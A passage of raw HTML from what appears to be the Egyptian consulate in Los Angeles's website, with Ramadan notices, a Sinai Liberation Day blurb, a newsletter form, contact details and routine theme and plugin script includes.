href="http://egyconsulatela.com/%d9%85%d9%88%d8%a7%d8%b9%d9%8a%d8%af-%d8%b9%d9%85%d9%84-%d8%a7%d9%84%d9%82%d9%86%d8%b5%d9%84%d9%8a%d8%a9-%d8%ae%d9%84%d8%a7%d9%84-%d8%b4%d9%87%d8%b1-%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d8%a7%d9%84%d9%83-2/">مواعيد عمل القنصلية خلال شهر رمضان الكريم</a> </h3> </header> <div class="entry-content clearfix" itemprop="text"> <footer class="entry-meta clearfix"> <a href="http://egyconsulatela.com/%d9%85%d9%88%d8%a7%d8%b9%d9%8a%d8%af-%d8%b9%d9%85%d9%84-%d8%a7%d9%84%d9%82%d9%86%d8%b5%d9%84%d9%8a%d8%a9-%d8%ae%d9%84%d8%a7%d9%84-%d8%b4%d9%87%d8%b1-%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d8%a7%d9%84%d9%83-2/" class="fw-btn-post-read-more-blog fw-btn fw-btn-md fw-btn-1" style=""> <span>     Read More     </span> </a> </footer> </div> </article> </div> </div> </div> </div><div id="column-5cdd8490798ec" class="fw-col-sm-12 fw-col-md-6 tf-sh-5e2df35798fd54dd7bc9fd8370048acb fw-animated-element" data-animation-type="fadeInLeft" data-animation-delay="300"> <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-shortcode-latest-posts postlist tf-sh-ebff5828497e6c3d6d2eece5d3d4fe01 fw-letter-no-caps" data-blog-type="blog-1" data-posts-per-page="1" data-category="36" data-page="2" data-max-pages="20" data-blog-view="default" data-columns="fw-portfolio-cols-3" data-extra='YToxOntzOjEzOiJleHRyYV9vcHRpb25zIjthOjY6e3M6OToicG9zdF9kYXRlIjtzOjI6Im5vIjtzOjExOiJwb3N0X2F1dGhvciI7czoyOiJubyI7czoxNToicG9zdF9jYXRlZ29yaWVzIjtzOjM6InllcyI7czoyMzoiZGlzcGxheV9jb21tZW50c19udW1iZXIiO2E6Mjp7czo4OiJzZWxlY3RlZCI7czoyOiJubyI7czozOiJ5ZXMiO2E6MTp7czoyMDoiY29tbWVudHNfbnVtYmVyX3R5cGUiO3M6MjI6ImZ3LWNvbW1lbnQtbGluay10eXBlLTEiO319czoxMDoiYmxvZ190aXRsZSI7YTo3OntzOjg6InNlbGVjdGVkIjtzOjI6ImgzIjtzOjI6ImgxIjthOjE6e3M6MTY6ImFkdmFuY2VkX3N0eWxpbmciO2E6Mjp7czoyOiJoMSI7YToxMTp7czoxMToiZ29vZ2xlX2ZvbnQiO2I6MTtzOjY6InN1YnNldCI7czo5OiJsYXRpbi1leHQiO3M6OToidmFyaWF0aW9uIjtzOjM6IjEwMCI7czo2OiJmYW1pbHkiO3M6NDoiTGF0byI7czo1OiJzdHlsZSI7YjowO3M6Njoid2VpZ2h0IjtiOjA7czo0OiJzaXplIjtzOjI6IjUyIjtzOjExOiJsaW5lLWhlaWdodCI7czoyOiI2NSI7czoxNDoibGV0dGVyLXNwYWNpbmciO3M6MjoiLTEiO3M6MTM6ImNvbG9yLXBhbGV0dGUiO2E6Mjp7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO3M6NToiY29sb3IiO3M6MDoiIjt9czo4OiJpc19zYXZlZCI7YjowO31zOjExOiJob3Zlcl9jb2xvciI7YToyOntzOjU6ImNvbG9yIjtzOjA6IiI7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO319fXM6MjoiaDIiO2E6MTp7czoxNjoiYWR2YW5jZWRfc3R5bGluZyI7YToyOntzOjI6ImgyIjthOjExOntzOjExOiJnb29nbGVfZm9udCI7YjoxO3M6Njoic3Vic2V0IjtzOjk6ImxhdGluLWV4dCI7czo5OiJ2YXJpYXRpb24iO3M6MzoiNzAwIjtzOjY6ImZhbWlseSI7czo0OiJMYXRvIjtzOjU6InN0eWxlIjtiOjA7czo2OiJ3ZWlnaHQiO2I6MDtzOjQ6InNpemUiO3M6MjoiMzYiO3M6MTE6ImxpbmUtaGVpZ2h0IjtzOjI6IjU2IjtzOjE0OiJsZXR0ZXItc3BhY2luZyI7czoyOiItMSI7czoxMzoiY29sb3ItcGFsZXR0ZSI7YToyOntzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7czo1OiJjb2xvciI7czowOiIiO31zOjg6ImlzX3NhdmVkIjtiOjA7fXM6MTE6ImhvdmVyX2NvbG9yIjthOjI6e3M6NToiY29sb3IiO3M6MDoiIjtzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7fX19czoyOiJoMyI7YToxOntzOjE2OiJhZHZhbmNlZF9zdHlsaW5nIjthOjI6e3M6MjoiaDMiO2E6MTE6e3M6MTE6Imdvb2dsZV9mb250IjtiOjE7czo2OiJzdWJzZXQiO3M6OToibGF0aW4tZXh0IjtzOjk6InZhcmlhdGlvbiI7czozOiIzMDAiO3M6NjoiZmFtaWx5IjtzOjQ6IkxhdG8iO3M6NToic3R5bGUiO2I6MDtzOjY6IndlaWdodCI7YjowO3M6NDoic2l6ZSI7czoyOiIzMCI7czoxMToibGluZS1oZWlnaHQiO3M6MjoiMzgiO3M6MTQ6ImxldHRlci1zcGFjaW5nIjtzOjE6IjAiO3M6MTM6ImNvbG9yLXBhbGV0dGUiO2E6Mjp7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO3M6NToiY29sb3IiO3M6MDoiIjt9czo4OiJpc19zYXZlZCI7YjowO31zOjExOiJob3Zlcl9jb2xvciI7YToyOntzOjU6ImNvbG9yIjtzOjA6IiI7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO319fXM6MjoiaDQiO2E6MTp7czoxNjoiYWR2YW5jZWRfc3R5bGluZyI7YToyOntzOjI6Img0IjthOjExOntzOjExOiJnb29nbGVfZm9udCI7YjoxO3M6Njoic3Vic2V0IjtzOjk6ImxhdGluLWV4dCI7czo5OiJ2YXJpYXRpb24iO3M6MzoiMzAwIjtzOjY6ImZhbWlseSI7czo0OiJMYXRvIjtzOjU6InN0eWxlIjtiOjA7czo2OiJ3ZWlnaHQiO2I6MDtzOjQ6InNpemUiO3M6MjoiMjYiO3M6MTE6ImxpbmUtaGVpZ2h0IjtzOjI6IjMyIjtzOjE0OiJsZXR0ZXItc3BhY2luZyI7czoxOiIwIjtzOjEzOiJjb2xvci1wYWxldHRlIjthOjI6e3M6MjoiaWQiO3M6OToiZnctY3VzdG9tIjtzOjU6ImNvbG9yIjtzOjA6IiI7fXM6ODoiaXNfc2F2ZWQiO2I6MDt9czoxMToiaG92ZXJfY29sb3IiO2E6Mjp7czo1OiJjb2xvciI7czowOiIiO3M6MjoiaWQiO3M6OToiZnctY3VzdG9tIjt9fX1zOjI6Img1IjthOjE6e3M6MTY6ImFkdmFuY2VkX3N0eWxpbmciO2E6Mjp7czoyOiJoNSI7YToxMTp7czoxMToiZ29vZ2xlX2ZvbnQiO2I6MTtzOjY6InN1YnNldCI7czo5OiJsYXRpbi1leHQiO3M6OToidmFyaWF0aW9uIjtzOjM6IjMwMCI7czo2OiJmYW1pbHkiO3M6NDoiTGF0byI7czo1OiJzdHlsZSI7YjowO3M6Njoid2VpZ2h0IjtiOjA7czo0OiJzaXplIjtzOjI6IjE5IjtzOjExOiJsaW5lLWhlaWdodCI7czoyOiIyOCI7czoxNDoibGV0dGVyLXNwYWNpbmciO3M6MToiMCI7czoxMzoiY29sb3ItcGFsZXR0ZSI7YToyOntzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7czo1OiJjb2xvciI7czowOiIiO31zOjg6ImlzX3NhdmVkIjtiOjA7fXM6MTE6ImhvdmVyX2NvbG9yIjthOjI6e3M6NToiY29sb3IiO3M6MDoiIjtzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7fX19czoyOiJoNiI7YToxOntzOjE2OiJhZHZhbmNlZF9zdHlsaW5nIjthOjI6e3M6MjoiaDYiO2E6MTE6e3M6MTE6Imdvb2dsZV9mb250IjtiOjE7czo2OiJzdWJzZXQiO3M6OToibGF0aW4tZXh0IjtzOjk6InZhcmlhdGlvbiI7czozOiIzMDAiO3M6NjoiZmFtaWx5IjtzOjQ6IkxhdG8iO3M6NToic3R5bGUiO2I6MDtzOjY6IndlaWdodCI7YjowO3M6NDoic2l6ZSI7czoyOiIxNCI7czoxMToibGluZS1oZWlnaHQiO3M6MjoiMjYiO3M6MTQ6ImxldHRlci1zcGFjaW5nIjtzOjE6IjAiO3M6MTM6ImNvbG9yLXBhbGV0dGUiO2E6Mjp7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO3M6NToiY29sb3IiO3M6MDoiIjt9czo4OiJpc19zYXZlZCI7YjowO31zOjExOiJob3Zlcl9jb2xvciI7YToyOntzOjU6ImNvbG9yIjtzOjA6IiI7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO319fX1zOjE0OiJidXR0b25fb3B0aW9ucyI7YTo5OntzOjU6InN0eWxlIjthOjQ6e3M6ODoic2VsZWN0ZWQiO3M6ODoiZnctYnRuLTEiO3M6ODoiZnctYnRuLTEiO2E6MTp7czoxMzoiYm9yZGVyX3JhZGl1cyI7czoxOiIwIjt9czo4OiJmdy1idG4tMiI7YToyOntzOjEzOiJib3JkZXJfcmFkaXVzIjtzOjE6IjAiO3M6MTE6ImJvcmRlcl9zaXplIjtzOjE6IjEiO31zOjg6ImZ3LWJ0bi0zIjthOjE6e3M6MTE6ImJvcmRlcl9zaXplIjtzOjE6IjEiO319czoxMjoibm9ybWFsX2NvbG9yIjthOjI6e3M6NToiY29sb3IiO3M6MDoiIjtzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7fXM6MTE6ImhvdmVyX2NvbG9yIjthOjI6e3M6NToiY29sb3IiO3M6MDoiIjtzOjI6ImlkIjtzOjk6ImZ3LWN1c3RvbSI7fXM6MjI6ImxhYmVsX2FkdmFuY2VkX3N0eWxpbmciO2E6Mjp7czo0OiJ0ZXh0IjthOjExOntzOjExOiJnb29nbGVfZm9udCI7YjoxO3M6Njoic3Vic2V0IjtzOjk6ImxhdGluLWV4dCI7czo5OiJ2YXJpYXRpb24iO3M6OToiNzAwaXRhbGljIjtzOjY6ImZhbWlseSI7czo0OiJMYXRvIjtzOjU6InN0eWxlIjtiOjA7czo2OiJ3ZWlnaHQiO2I6MDtzOjQ6InNpemUiO3M6MjoiMTUiO3M6MTE6ImxpbmUtaGVpZ2h0IjtzOjI6IjMwIjtzOjE0OiJsZXR0ZXItc3BhY2luZyI7czo0OiItMC41IjtzOjEzOiJjb2xvci1wYWxldHRlIjthOjI6e3M6MjoiaWQiO3M6OToiZnctY3VzdG9tIjtzOjU6ImNvbG9yIjtzOjA6IiI7fXM6ODoiaXNfc2F2ZWQiO2I6MTt9czoxNjoiaG92ZXJfdGV4dF9jb2xvciI7YToyOntzOjU6ImNvbG9yIjtzOjA6IiI7czoyOiJpZCI7czo5OiJmdy1jdXN0b20iO319czo1OiJsYWJlbCI7czozNzoiJm5ic3A7ICZuYnNwOyBSZWFkIE1vcmUgJm5ic3A7ICZuYnNwOyI7czo0OiJzaXplIjthOjI6e3M6ODoic2VsZWN0ZWQiO3M6OToiZnctYnRuLW1kIjtzOjY6ImN1c3RvbSI7YToyOntzOjU6IndpZHRoIjtzOjA6IiI7czo2OiJoZWlnaHQiO3M6MDoiIjt9fXM6OToiaWNvbl90eXBlIjthOjM6e3M6ODoidGFiX2ljb24iO3M6MTA6Imljb24tY2xhc3MiO3M6MTA6Imljb24tY2xhc3MiO2E6MTp7czoxMDoiaWNvbl9jbGFzcyI7czowOiIiO31zOjExOiJ1cGxvYWQtaWNvbiI7YToxOntzOjE3OiJ1cGxvYWQtY3VzdG9tLWltZyI7czowOiIiO319czoxMzoiaWNvbl9wb3NpdGlvbiI7czoxNDoicHVsbC1sZWZ0LWljb24iO3M6OToiaWNvbl9zaXplIjtzOjI6IjEyIjt9fX0='> <article id="post-2239" class="post clearfix post-list-type-1 post-2239 type-post status-publish format-standard has-post-thumbnail hentry category-about-egypt category-all category-consulate-activities category-events category-news-announcements category-uncategorized" itemscope="itemscope" itemtype="https://schema.org/BlogPosting" itemprop="blogPost"> <div class="fw-post-image fw-block-image-parent fw-overlay-1"> <a href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85-2/" class="post-thumbnail fw-block-image-child fw-ratio-16-9 fw-ratio-container"> <noscript itemscope itemtype="https://schema.org/ImageObject" itemprop="image"><img src="http://egyconsulatela.com/wp-content/uploads/2018/05/ramadan-images-2.jpg" alt="ramadan-images-2" data-maxdpr="1.7" class="attachment-post-thumbnail lazyload" /><meta itemprop="url" content="http://egyconsulatela.com/wp-content/uploads/2018/05/ramadan-images-2.jpg"><meta itemprop="width" content="564"><meta itemprop="height" content="564"></noscript><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-sizes="auto" data-srcset="http://egyconsulatela.com/wp-content/uploads/2018/05/ramadan-images-2-295x166.jpg 295w" alt="ramadan-images-2" data-maxdpr="1.7" class="attachment-post-thumbnail lazyload" /> <div class="fw-block-image-overlay"> <div class="fw-itable"> <div class="fw-icell"> <i class="fw-icon-link"></i> </div> </div> </div> </a> </div> <header class="entry-header"> <div class="wrap-entry-meta"> <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://google.com/article"/> <span class="cat-links"> In <a href="http://egyconsulatela.com/category/about-egypt/" rel="tag">About Egypt</a>, <a href="http://egyconsulatela.com/category/all/" rel="tag">All Posts</a>, <a href="http://egyconsulatela.com/category/consulate-activities/" rel="tag">Consulate Activities</a>, <a href="http://egyconsulatela.com/category/all/events/" rel="tag">Events</a>, <a href="http://egyconsulatela.com/category/news-announcements/" rel="tag">News &amp; Announcements</a>, <a href="http://egyconsulatela.com/category/uncategorized/" rel="tag">Uncategorized</a></span> </div> <h3 class="entry-title" itemprop="headline"> <a href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85-2/">رمضان كريم</a> </h3> </header> <div class="entry-content clearfix" itemprop="text"> <footer class="entry-meta clearfix"> <a href="http://egyconsulatela.com/%d8%b1%d9%85%d8%b6%d8%a7%d9%86-%d9%83%d8%b1%d9%8a%d9%85-2/" class="fw-btn-post-read-more-blog fw-btn fw-btn-md fw-btn-1" style=""> <span>     Read More     </span> </a> </footer> </div> </article> </div> </div> </div> </div></div> </div> </section><section id="section-5cdd8490806ab" class=" fw-main-row-custom fw-section-no-padding auto fw-section-position-back tf-sh-c0e7f06cb3340357a7a02e50fce4b071 " style=" " > <div class="fw-container" > <div class="fw-row"> <div id="column-5cdd849081069" class="fw-col-sm-12 tf-sh-cacb747f5fa7f48f20f26b934867c06f" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-divider-space space-md clearfix" ></div> </div> </div> </div></div> <div class="fw-row"> <div id="column-5cdd849081bb6" class="fw-col-sm-8 fw-col-md-6 tf-sh-771b5958fbd6d8e0496321970b7d6ef8 fw-col-no-padding" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-divider-space space-sm clearfix" ></div><div class="fw-heading fw-heading-left tf-sh-09b1b1e62099883be985fd0ece11f678" > <h3 class="fw-special-title">UPCOMING HOLIDAYS & EVENTS</h3> </div> </div> </div> </div><div id="column-5cdd84908282a" class="fw-tablet-hide-element fw-col-sm-6 fw-mobile-hide-element tf-sh-a3ddfd2566c7a31de2373f8bfd490fb3" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> </div> </div> </div></div> <div class="fw-row"> <div id="column-5cdd849083107" class="fw-col-sm-12 fw-col-md-6 tf-sh-cdf97ebe2b72c5a3a58f7dbe953aa520 fw-col-no-padding" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div id="calendar" data-extends-ajax-params="{&quot;events_category&quot;:&quot;&quot;,&quot;data_provider&quot;:&quot;events&quot;}" data-ajax-url="http://egyconsulatela.com/wp-admin/admin-ajax.php" data-template="month" data-template-path="http://egyconsulatela.com/wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/calendar/views/" data-first-day="1" class=" wrapp_calendar fw-shortcode-calendar-wrapper shortcode-container tf-sh-ba08190d9d423d173e710fcdb3643446" > <div class="fw-shortcode-calendar"></div> <div class="page-header hidden-header"> <div class="calendar-navigation btn-group"> <button data-calendar-nav="prev" class="prev"><i class="fa fa-angle-left"></i></button> <h3><!-- Here will be set the title --></h3> <button class="next" data-calendar-nav="next"><i class="fa fa-angle-right"></i></button> </div> </div> </div> </div> </div> </div><div id="column-5cdd849085de0" class="fw-col-sm-12 fw-col-md-6 tf-sh-388e8b56785a65d56ca50c8b78e48f7e fw-animated-element fw-col-no-padding" data-animation-type="fadeInRight" data-animation-delay="300"> <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-heading fw-heading-left fw-heading-with-subtitle tf-sh-baaf3fb4a3ebbd31459bb822a7e1ae5c" > <div class="fw-special-subtitle">November 14, 2016</div> </div><div class="fw-heading fw-heading-left tf-sh-c8a8951174d8111ab3557f13d962e50f" > <h3 class="fw-special-title">Sinai Liberation Day</h3> </div><div class="fw-divider-space fw-custom-space clearfix" style="height:10px;" ></div><div class="fw-text-box tf-sh-ba6d73df81ec0b835fc3a2f0de990be4 " > <div class="fw-text-inner"> <p><b>Sinai liberation day</b> is a public holiday in Egypt which celebrates the liberation of the land of Sinai from occupation back to Egyptian sovereignty<sup id="cite_ref-ahram_multimedia_article_1-0" class="reference">[1]</sup>. It is the anniversary of the liberation of the peninsula of Sinai corresponding to April 25 of each year, celebrating the day in 1982 when Egypt recovered the land of Sinai and the withdrawal of the last Israeli soldier from the city of Taba in 1988. This came in accordance to the international peace treaty of 1979 and the settlement of the long diplomatic disputes<sup id="cite_ref-sis_intro_article_2-0" class="reference">[2]</sup>. On this day, Egyptians give tribute to the Egyptian officers and soldiers from the Egyptian armed forces and their sacrifices which led to the recovery of Sinai from occupation. This day is also dedicated for celebrating the beauty of Sinai which hosts many touristic cities like Sharm El Sheikh and Dahab along the Egyptian Red Sea Riviera, being popular destinations for Egyptians and foreign tourists alike.</p> </div> </div><div class="fw-divider-space fw-custom-space clearfix" style="height:35px;" ></div><div class="text-left"> <a href="http://hostallover.com/losangeles/?fw-portfolio=healing-through-art" target="_self" class="fw-btn tf-sh-f3868c78f9cf1b54fbdb98546c56b564 fw-btn-sm fw-btn-2" style=""> <span >       Event details       </span> </a> </div> </div> </div> </div></div> <div class="fw-row"> <div id="column-5cdd849087e67" class="fw-col-sm-12 tf-sh-cacb747f5fa7f48f20f26b934867c06f" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-divider-space fw-custom-space fw-mobile-hide-element clearfix" style="height:70px;" ></div> </div> </div> </div></div> </div> </section><section id="section-5cdd849088a6f" class=" fw-main-row-custom fw-section-no-padding fw_theme_bg_fw-custom fw-section-image auto fw-section-position-back tf-sh-d9c3462a1078247f8cf46e8b0d33ce38 " style=" background-image:url(//hostallover.com/losangeles/wp-content/uploads/2018/04/Africa-Egypt-and-the-Nile-Pyraminds-MH.jpg); background-repeat: no-repeat; background-position: left bottom; background-size: cover; " > <div class="fw-main-row-overlay fw_theme_bg_color_4" style="opacity: 0.59;"></div> <div class="fw-container" > <div class="fw-row"> <div id="column-5cdd8490893ec" class="fw-col-sm-12 tf-sh-cacb747f5fa7f48f20f26b934867c06f" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-divider-space fw-custom-space fw-mobile-hide-element clearfix" style="height:138px;" ></div> </div> </div> </div></div> <div class="fw-row"> <div id="column-5cdd84908a030" class="fw-col-sm-12 fw-col-md-2 tf-sh-c2ba4371af6105aaef8dd7cb2e6ee12b fw-animated-element" data-animation-type="fadeInRight" data-animation-delay="300"> <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> </div> </div> </div><div id="column-5cdd84908a5a3" class="fw-col-sm-12 fw-col-md-8 tf-sh-56d07e166b097741d4b6ee425ea823be fw-animated-element" data-animation-type="fadeInRight" data-animation-delay="300"> <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-heading fw-heading-left fw-heading-with-subtitle tf-sh-900cb213d4465d25b89bfd872ae7119b" > <h3 class="fw-special-title">NEWSLETTER SIGN-UP</h3> <div class="fw-special-subtitle">Keep in touch and receive the consulate update.</div> </div><div class="fw-divider-space fw-custom-space clearfix" style="height:5px;" ></div> <a href="http://egyconsulatela.com/newsletter-page/" target="_blank" class="fw-btn tf-sh-fe95360e6ff4eae6e057f4e344cb2343 fw-btn-full fw-btn-lg fw-btn-1" style=""> <span > Subscribe Now </span> </a> </div> </div> </div><div id="column-5cdd84908b75e" class="fw-col-sm-12 fw-col-md-2 tf-sh-b2246012eca465064d3193ba99247a08 fw-animated-element" data-animation-type="fadeInRight" data-animation-delay="300"> <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> </div> </div> </div></div> <div class="fw-row"> <div id="column-5cdd84908bf98" class="fw-col-sm-12 tf-sh-cacb747f5fa7f48f20f26b934867c06f" > <div class="fw-wrap-col-inner clearfix " > <div class="fw-col-inner"> <div class="fw-divider-space fw-custom-space fw-mobile-hide-element clearfix" style="height:90px;" ></div> </div> </div> </div></div> </div> </section></div> </div><!-- /.site-main --> <!-- Footer --> <footer id="colophon" class="site-footer fw-footer " itemscope="itemscope" itemtype="https://schema.org/WPFooter"> <div class="fw-footer-widgets footer-cols-4"> <div class="fw-inner"> <div class="fw-container"> <div class="fw-row"> <div class="fw-col-md-3 fw-col-sm-6"> <aside id="text-8" class="widget-odd widget-last widget-first widget-1 widget widget_text"> <div class="textwidget"><p><img class="alignnone wp-image-1304" src="http://hostallover.com/losangeles/wp-content/uploads/2018/04/2000px-Coat_of_arms_of_Egypt_Official.svg_-221x300.png" alt="" width="213" height="289" /></p> </div> </aside> </div> <div class="fw-col-md-3 fw-col-sm-6"> <aside id="easy_facebook_page_plugin-2" class="widget-odd widget-first widget-1 widget widget_easy_facebook_page_plugin"><h2 class="widget-title"><span>Stay Connected </span></h2><div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.async=true; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=395202813876688"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="efbl-like-box 1"> <img class="efbl-loader" src="http://egyconsulatela.com/wp-content/plugins/easy-facebook-likebox/public/assets/images/loader.gif" > <div class="fb-page" data-animclass="fadeIn " data-href="https://www.facebook.com/egyptianconsulateinla" data-hide-cover=false data-width="250" data-height="" data-show-facepile=true data-show-posts=false data-adapt-container-width=true data-hide-cta=false data-small-header="false"> </div> </div> </aside> </div> <div class="fw-col-md-3 fw-col-sm-6"> <aside id="text-9" class="widget-odd widget-first widget-1 widget widget_text"><h2 class="widget-title"><span>Contacts</span></h2> <div class="textwidget"><p><strong>6300 Wilshire Blvd, Ste 1890</strong><br /> <strong> Los Angeles, 90048</strong><br /> <strong> Tel:  (323) 933.9700</strong><br /> <strong> (323) 933.9757</strong><br /> <strong> (323) 933.1401</strong><br /> <strong> Fax: (323) 933.9725</strong></p> </div> </aside> </div> <div class="fw-col-md-3 fw-col-sm-6"> <aside id="newsletterwidget-2" class="widget-odd widget-first widget-1 widget widget_newsletterwidget"><h2 class="widget-title"><span>Newsletter</span></h2><div class="tnp tnp-widget"><form method="post" action="http://egyconsulatela.com/?na=s" onsubmit="return newsletter_check(this)"> <input type="hidden" name="nr" value="widget"> <input type='hidden' name='nl[]' value='0'> <div class="tnp-field tnp-field-firstname"><label>Name</label><input class="tnp-firstname" type="text" name="nn" ></div> <div class="tnp-field tnp-field-email"><label>Email</label><input class="tnp-email" type="email" name="ne" required></div> <div class="tnp-field tnp-field-button"><input class="tnp-submit" type="submit" value="Subscribe"> </div> </form> </div> </aside> </div> </div> </div> </div> </div> <div class="fw-footer-middle "> <div class="fw-container"> </div> </div> <div class="fw-footer-bar fw-copyright-center"> <div class="fw-container"> <div class="fw-copyright"><p>Made with Love ❤️ by <a href="http://newegyptgroup.com">NewEgyptGroup</a></p></div> </div> </div> </footer> </div><!-- /#page --> <a class="scroll-to-top anchor icon-class" href="#page"><i class=""></i></a> <!--Start of Tawk.to Script (0.3.3)--> <script type="text/javascript"> var Tawk_API=Tawk_API||{}; var Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.tawk.to/5ae7a846227d3d7edc24da53/default'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })(); </script> <!--End of Tawk.to Script (0.3.3)--> <script type="text/javascript"> function revslider_showDoubleJqueryError(sliderID) { var errorMessage = "Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include."; errorMessage += "<br> This includes make eliminates the revolution slider libraries, and make it not work."; errorMessage += "<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true."; errorMessage += "<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it."; errorMessage = "<span style='font-size:16px;color:#BC0C06;'>" + errorMessage + "</span>"; jQuery(sliderID).show().html(errorMessage); } </script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/easy-sidebar-menu-widget/assets/js/jquery.easy-sidebar-menu-widget.min.js?ver=4.9.10'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-includes/js/jquery/ui/selectmenu.min.js?ver=1.11.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var newsletter = {"messages":{"email_error":"The email is not correct","name_error":"The name is not correct","surname_error":"The last name is not correct","privacy_error":"You must accept the privacy statement"},"profile_max":"20"}; /* ]]> */ </script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/newsletter/subscription/validate.js?ver=5.4.0'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/jquery.carouFredSel-6.2.1-packed.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/jquery.prettyPhoto.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/jquery.customInput.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/scrollTo.min.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/jquery.mmenu.min.all.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/selectize.min.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/jquery.parallax.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/lazysizes.min.js?ver=2.0.15'></script> <script type='text/javascript'> /* <![CDATA[ */ var FwPhpVars = {"back":"Back","lang":"en","ajax_url":"http:\/\/egyconsulatela.com\/wp-admin\/admin-ajax.php","template_directory":"http:\/\/egyconsulatela.com\/wp-content\/themes\/philanthropy-parent","previous":"Previous","next":"Next","fail_form_error":"Sorry you are an error in ajax, please contact the administrator of the website","smartphone_animations":"no","mobile_menu_position":"left","mobile_menu_page_dim":"page-dim-none","mobile_menu_border_style":"indent","header_5_position":"left","header_6_position":"left","mobile_menu_screen":"1199","effect_panels":"mm-effect-panels-left-right","effect_listitems_slide":"effect-listitems-slide","sticky_resolution":"767","sticky_logo":"","socials":"<div class=\"mobile-menu-socials\"><a target=\"_blank\" href=\"http:\/\/www.facebook.com\"><i class=\"fa fa-facebook\"><\/i><\/a><a target=\"_blank\" href=\"http:\/\/www.twitter.com\"><i class=\"fa fa-twitter\"><\/i><\/a><a target=\"_blank\" href=\"http:\/\/www.youtube.com\"><i class=\"fa fa-youtube\"><\/i><\/a><\/div>"}; /* ]]> */ </script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/themes/philanthropy-parent/js/general.js?ver=2.0.15'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/core.js?ver=4.9.10'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/transition.js?ver=4.9.10'></script> <script type='text/javascript' src='http://egyconsulatela.com/wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/background.js?ver=4.9.10'></script> <script type='text/javascript' 